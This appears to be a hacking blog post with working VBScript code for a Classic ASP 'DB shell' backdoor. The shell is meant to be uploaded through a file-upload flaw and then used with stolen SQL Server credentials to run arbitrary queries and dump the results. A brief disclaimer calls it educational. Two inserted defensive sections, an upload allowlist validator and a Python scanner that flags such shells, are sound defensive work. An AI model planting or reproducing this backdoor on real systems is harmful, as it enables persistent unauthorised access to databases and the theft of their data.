Classic ASP (Active Server Pages) With MS SQL Server DB Backdoor

Disclaimer: The information provided here is to be used for educational purposes only. The website creator is in no way responsible for any misuse of the information provided. All of the information in this website is meant to help the reader develop a hacker defense attitude in order to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly.

Assumption
———
1. The ASP.Net application has a file upload vulnerability.
2. We have obtained the username, password, database name and server name of the database.
3. The application does not allow uploading files whose extension is longer than 3 characters.
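Assumption 3 is what makes the rest of this walkthrough possible: a filter that only rejects extensions longer than three characters lets .asp through unchanged. The check below is an added example, not part of this post, showing how an upload handler should validate instead: an allowlist of the extensions the application actually needs, a content (magic-byte) check, and a strict filename pattern that leaves no room for double extensions or trailing dots. It assumes an application that only needs images and PDFs; ALLOWED_EXTENSIONS, SERVER_EXECUTABLE and MAGIC are illustrative values chosen for this example.

```python
import re

# Allowlist of extensions this application genuinely needs to accept.
# Assumption for this example: the app only needs images and PDFs.
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".pdf"}

# Extensions IIS hands to a script engine. Most are three characters or fewer,
# so a rule that only rejects extensions longer than three characters blocks none of them.
SERVER_EXECUTABLE = {".asp", ".asa", ".asax", ".ascx", ".ashx", ".asmx", ".aspx", ".cer", ".cdx"}

# Leading bytes a file of each accepted type must start with.
MAGIC = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
    ".pdf": b"%PDF-",
}

# A file stem may only contain letters, digits, underscore and dash: no second
# dot (double extensions), no semicolon, no NUL, no path separators.
SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def length_rule_allows(filename: str) -> bool:
    """The weak check from assumption 3 above: accept any extension of three characters or fewer."""
    ext = filename.rsplit(".", 1)[-1] if "." in filename else ""
    return len(ext) <= 3


def validate_upload(filename: str, head: bytes) -> tuple[bool, str]:
    """Allowlist check on name and content. Returns (accepted, reason)."""
    # Strip any client-supplied directory component, with either separator.
    base = re.split(r"[\\/]", filename)[-1]
    # Windows silently drops trailing dots and spaces, so "shell.asp." would be stored as "shell.asp".
    if base != base.rstrip(". "):
        return False, "trailing dot or space in name"
    if base.count(".") != 1:
        return False, "name must have exactly one extension"
    stem, ext = base.split(".")
    ext = "." + ext.lower()
    if not SAFE_STEM.match(stem):
        return False, "unsafe characters in name"
    if ext in SERVER_EXECUTABLE:
        return False, "server-executable extension"
    if ext not in ALLOWED_EXTENSIONS:
        return False, "extension not in allowlist"
    if not head.startswith(MAGIC[ext]):
        return False, "content does not match extension"
    return True, "ok"


if __name__ == "__main__":
    # Constructed inputs: the length rule passes shell.asp, the allowlist does not.
    print("length rule allows shell.asp:", length_rule_allows("shell.asp"))
    print("allowlist on shell.asp:", validate_upload("shell.asp", b"<% %>"))
    print("allowlist on photo.jpg:", validate_upload("photo.jpg", b"\xff\xd8\xff\xe0"))
```

The validator decides on the stored name, not the name the client claims, and it never consults a denylist alone: the SERVER_EXECUTABLE set only exists to give a more specific rejection reason, and anything outside ALLOWED_EXTENSIONS is refused regardless.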

Let’s get started.

1. Create the ASP page
Create a plain ASP page with no VBScript code embedded yet; the markup below is the skeleton.

<% @Language=VBScript %>
<html dir=ltr>
<head>
<title>Classic asp DB Shell</title>
<style>
.dblabel{width: 26%; float: left; padding: 0 0 4px 0; text-align: right;}
.dbText{width: 50%; float: left; padding: 0 0 4px 0;}
</style>
</head>
<body>
<h1>Db Info</h1>
<form method="post">

</form>
</body>
</html>

2. Add the basic fields
After creating the empty ASP page, add the input fields whose values will be passed into the connection string, plus a field for the query to be executed. These go inside the <form> element:

<div style="width:50%;">
   <div class="dblabel">Server Name : </div>
   <div class="dbText"><input type="text" name="sName" /></div>
   <div class="dblabel">Server Port : </div>
   <div class="dbText"><input type="text" name="sPort" /></div>
   <div class="dblabel">User Name : </div>
   <div class="dbText"><input type="text" name="dbUName" /></div>
   <div class="dblabel">Password : </div>
   <div class="dbText"><input type="text" name="dbPass" /></div>
   <div class="dblabel">Database : </div>
   <div class="dbText"><input type="text" name="dbName" /></div>
   <div class="dblabel">Query :</div>
   <div class="dbText"><textarea name="query" rows="4" cols="50"></textarea></div>
   <div class="dblabel"></div>
   <div class="dbText"><input type="submit" name="submit" value="Run Query"/></div>
</div>

3. Write the business logic
Write the logic that executes the query. Check that all input fields are filled in before proceeding; after executing the query, display all returned records in a table.

<%
	Dim fname
	fname = Request.Form("submit")

	Response.Buffer = True
	On Error Resume Next

	Dim host
	Dim port
	Dim user
	Dim password
	Dim database

	host = Request.Form("sName")
	port = Request.Form("sPort")
	user = Request.Form("dbUName")
	password = Request.Form("dbPass")
	database = Request.Form("dbName")

	' Only attempt a connection when every field has been filled in
	If host <> "" And port <> "" And user <> "" And password <> "" And database <> "" Then
		Dim conn
		Set conn = Server.CreateObject("ADODB.Connection")
		Dim ds
		ds = host & "," & port
		Dim connString
		connString = "Provider=SQLOLEDB;Data Source=" & ds & ";Network Library=DBMSSOCN;Initial Catalog=" & database & ";User Id=" & user & ";Password=" & password & ";"
		conn.Open connString
		If conn.Errors.Count > 0 Then
			Response.Write "Error: Unable to Connect " & Err.Description
			Response.End
		End If

		Dim query
		Dim rs
		Dim objField
		query = Request.Form("query")

		If query <> "" Then
			Set rs = conn.Execute(query)
			If conn.Errors.Count > 0 Then
				Response.Write "Error: " & Err.Description
			Else
				' Header row: one cell per column name
				Response.Write "<table><tr>"
				For Each objField In rs.Fields
					Response.Write "<td>" & objField.Name & "</td>"
				Next
				Response.Write "</tr>"

				' One row per record
				While Not rs.EOF
					Response.Write "<tr>"
					For Each objField In rs.Fields
						Response.Write "<td>" & rs(objField.Name) & "</td>"
					Next
					rs.MoveNext
					Response.Write "</tr>"
				Wend
				Response.Write "</table>"

				rs.Close
			End If
		End If

		conn.Close
		Set conn = Nothing
	End If
%>

That's it. This page establishes a connection to MS SQL Server and returns records from the database.
Bingo!
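From the defender's side, the page just built has a recognisable shape: an ADODB.Connection, a connection string whose credentials are concatenated from Request fields, and a Request-supplied string handed straight to Execute. Below is an added example, not from this post, of a small line-oriented taint scan over ASP source that reports exactly those three indicators. The two ASP samples are constructed for the example (an abridged copy of the shell above and a benign product-listing page), and the indicator regexes are a heuristic devised here, not a signature from any product.

```python
import re

# Indicators derived from the shell shown above. Heuristic regexes constructed
# for this example; they are not a complete web-shell signature set.
ADO_CONN = re.compile(r'CreateObject\s*\(\s*"ADODB\.Connection"\s*\)', re.I)
REQUEST_REF = re.compile(r"\bRequest\b", re.I)
ASSIGN = re.compile(r"^\s*(?:Set\s+)?([A-Za-z_]\w*)\s*=\s*(.+)$", re.I)
EXECUTE = re.compile(r"\.Execute\s*\(?\s*([A-Za-z_]\w*)", re.I)
CONN_STRING = re.compile(r"Provider=|Data Source=", re.I)
CONCAT_VAR = re.compile(r"&\s*([A-Za-z_]\w*)\s*&")
IDENT = re.compile(r"[A-Za-z_]\w*")

# Constructed sample: an abridged version of the shell from this page.
SHELL_SAMPLE = """\
<% @Language=VBScript %>
<%
Dim host, port, user, password, database, query
host = Request.Form("sName")
port = Request.Form("sPort")
user = Request.Form("dbUName")
password = Request.Form("dbPass")
database = Request.Form("dbName")
Set conn = Server.CreateObject("ADODB.Connection")
ds = host & "," & port
connString = "Provider=SQLOLEDB;Data Source=" & ds & ";Initial Catalog=" & database & ";User Id=" & user & ";Password=" & password & ";"
conn.Open connString
query = Request.Form("query")
Set rs = conn.Execute(query)
%>
"""

# Constructed sample: a benign page using a server-side connection string and fixed SQL.
BENIGN_SAMPLE = """\
<%
Dim conn, rs, sql
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open Application("ProductsConnString")
sql = "SELECT name, price FROM products ORDER BY name"
Set rs = conn.Execute(sql)
%>
"""


def scan_asp_source(text: str) -> list[tuple[int, str]]:
    """Single-pass taint scan of one ASP file.

    A variable becomes tainted when it is assigned from Request.* or from an
    expression that mentions an already tainted variable. Findings are
    (line_number, kind) tuples in source order.
    """
    tainted: set[str] = set()
    findings: list[tuple[int, str]] = []
    for no, line in enumerate(text.splitlines(), 1):
        if ADO_CONN.search(line):
            findings.append((no, "ado_connection"))
        m = ASSIGN.match(line)
        if m:
            lhs, rhs = m.group(1).lower(), m.group(2)
            rhs_idents = {t.lower() for t in IDENT.findall(rhs)}
            if REQUEST_REF.search(rhs) or rhs_idents & tainted:
                tainted.add(lhs)
        m = EXECUTE.search(line)
        if m and m.group(1).lower() in tainted:
            findings.append((no, "execute_of_request_input"))
        if CONN_STRING.search(line):
            used = {v.lower() for v in CONCAT_VAR.findall(line)}
            if used & tainted:
                findings.append((no, "credentials_from_request_input"))
    return findings


def is_suspected_db_shell(text: str) -> bool:
    """Flag a file that opens an ADO connection and executes request-controlled SQL text."""
    kinds = {kind for _, kind in scan_asp_source(text)}
    return "ado_connection" in kinds and "execute_of_request_input" in kinds


if __name__ == "__main__":
    for name, src in (("shell", SHELL_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, is_suspected_db_shell(src), scan_asp_source(src))
```

Run over a web root, the interesting hits are the ones where "execute_of_request_input" appears, since legitimate pages normally execute fixed SQL or parameterised commands; the credentials indicator on its own is a strong secondary signal, because an application page has no reason to take its database login from the browser.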

About tvskumar2000

Tvs always cooooool
This entry was posted in DB Backdoor, Hacking.